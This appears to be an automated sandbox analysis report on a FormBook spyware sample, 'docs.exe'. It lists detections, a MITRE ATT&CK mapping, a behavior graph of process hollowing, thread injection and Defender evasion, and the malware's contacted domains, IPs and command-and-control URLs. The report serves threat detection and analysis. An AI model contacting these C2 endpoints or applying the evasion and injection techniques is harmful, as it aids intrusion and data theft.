          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005979A0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,8_2_005979A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0058B8C3 RegisterEventSourceW,GetUserNameW,LookupAccountNameW,LookupAccountNameW,ReportEventW,DeregisterEventSource,SysFreeString,RegCloseKey,RegCloseKey,8_2_0058B8C3
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005891C6 SysAllocString,GetVersionExA,IsTextUnicode,MultiByteToWideChar,GetLastError,SysAllocStringLen,MultiByteToWideChar,GetLastError,_swab,memmove,SysFreeString,8_2_005891C6
          Source: C:\Users\user\Desktop\docs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.docs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.docs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.docs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.docs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_00591170 CreateBindCtx,CreateFileMoniker,MkParseDisplayName,8_2_00591170
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_00589D9A CreateBindCtx,SysFreeString,SysAllocStringByteLen,8_2_00589D9A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0058DEED CoCreateInstance,CoCreateInstance,GetUserDefaultLCID,CoGetClassObject,CreateBindCtx,8_2_0058DEED

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Shared Modules          		1
          DLL Side-Loading          		1
          Abuse Elevation Control Mechanism          		11
          Disable or Modify Tools          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		2
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory1
          Account Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)512
          Process Injection          		1
          Abuse Elevation Control Mechanism          		Security Account Manager2
          File and Directory Discovery          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
          Obfuscated Files or Information          		NTDS224
          System Information Discovery          		Distributed Component Object ModelInput Capture12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
          Software Packing          		LSA Secrets231
          Security Software Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Timestomp          		Cached Domain Credentials2
          Process Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading          		DCSync41
          Virtualization/Sandbox Evasion          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Rootkit          		Proc Filesystem1
          Application Window Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Masquerading          		/etc/passwd and /etc/shadow1
          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron41
          Virtualization/Sandbox Evasion          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd512
          Process Injection          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522819 Sample: docs.exe Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 37 www.venir-bienne.info 2->37 39 www.uijiuw.top 2->39 41 9 other IPs or domains 2->41 47 Suricata IDS alerts for network traffic 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 9 other signatures 2->53 11 docs.exe 4 2->11         started        signatures3 process4 file5 35 C:\Users\user\AppData\Local\...\docs.exe.log, ASCII 11->35 dropped 57 Adds a directory exclusion to Windows Defender 11->57 59 Tries to detect virtualization through RDTSC time measurements 11->59 61 Switches to a custom stack to bypass stack traces 11->61 15 docs.exe 11->15         started        18 powershell.exe 23 11->18         started        signatures6 process7 signatures8 71 Modifies the context of a thread in another process (thread injection) 15->71 73 Maps a DLL or memory area into another process 15->73 75 Sample uses process hollowing technique 15->75 79 2 other signatures 15->79 20 explorer.exe 68 1 15->20 injected 77 Loading BitLocker PowerShell Module 18->77 24 WmiPrvSE.exe 18->24         started        26 conhost.exe 18->26         started        process9 dnsIp10 43 www.oko.events 185.26.122.70, 49727, 80 HOSTLANDRU Russian Federation 20->43 45 www.j88.travel 188.114.96.3, 49733, 80 CLOUDFLARENETUS European Union 20->45 55 System process connects to network (likely due to code injection or exploit) 20->55 28 wscript.exe 20->28         started        signatures11 process12 signatures13 63 Modifies the context of a thread in another process (thread injection) 28->63 65 Maps a DLL or memory area into another process 28->65 67 Tries to detect virtualization through RDTSC time measurements 28->67 69 Switches to a custom stack to bypass stack traces 28->69 31 cmd.exe 1 28->31         started        process14 process15 33 conhost.exe 31->33         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          docs.exe45%ReversingLabsByteCode-MSIL.Spyware.Negasteal
          docs.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
          https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
          https://android.notify.windows.com/iOS0%URL Reputationsafe
          http://schemas.micro0%URL Reputationsafe
          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
          https://api.msn.com/0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.j88.travel
          		188.114.96.3
          		truetrue
            		unknown
            www.oko.events
            		185.26.122.70
            		truetrue
              		unknown
              www.eviewmadu.top
              		unknown
              		unknowntrue
                		unknown
                www.hecreature.tech
                		unknown
                		unknowntrue
                  		unknown
                  www.aithful.events
                  		unknown
                  		unknowntrue
                    		unknown
                    www.ealerslot.net
                    		unknown
                    		unknowntrue
                      		unknown
                      www.23fd595ig.autos
                      		unknown
                      		unknowntrue
                        		unknown
                        www.uijiuw.top
                        		unknown
                        		unknowntrue
                          		unknown
                          www.amilablackwell.online
                          		unknown
                          		unknowntrue
                            		unknown
                            www.khizmetlergirisyapzzz2024.net
                            		unknown
                            		unknowntrue
                              		unknown
                              www.venir-bienne.info
                              		unknown
                              		unknowntrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46Ftrue
                                  		unknown
                                  http://www.oko.events/c24t/?I6=z+nAhoA8drw9p0SUk4F23aiKXvdwmiYumykkUl5XSRWt3Wct2pK+VZvxUbC02dv5lpT+B1+jbQ==&AL0=9rN46Ftrue
                                    		unknown
                                    www.ridges-freezers-56090.bond/c24t/true
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://www.oko.eventsReferer:explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://www.delark.clickReferer:explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngFexplorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://www.ridges-freezers-56090.bondReferer:explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2157815827.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000973C000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.aithful.events/c24t/explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://word.office.comMexplorer.exe, 00000006.00000003.3077968513.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2987216711.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2163588037.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4606870784.000000000C071000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986355937.000000000C06D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://www.eviewmadu.top/c24t/www.khizmetlergirisyapzzz2024.netexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://www.472.top/c24t/www.earing-tests-69481.bondexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameriexplorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://www.aithful.eventsexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://www.472.topexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://www.amilablackwell.onlineReferer:explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://www.472.top/c24t/explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://www.23fd595ig.autos/c24t/explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://www.venir-bienne.info/c24t/www.472.topexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://www.j88.travelReferer:explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://wns.windows.com/eexplorer.exe, 00000006.00000003.3075948830.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603707608.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2158468861.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727477538.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979257324.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedocs.exe, 00000000.00000002.2160016383.0000000002FF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.khizmetlergirisyapzzz2024.netexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://www.uijiuw.topReferer:explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://www.uijiuw.top/c24t/www.oko.eventsexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000006.00000003.2981207775.000000000C3E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986623556.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2163588037.000000000C3E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://www.earing-tests-69481.bondexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://www.venir-bienne.info/c24t/explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://www.consuyt.xyz/c24t/explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&ocexplorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
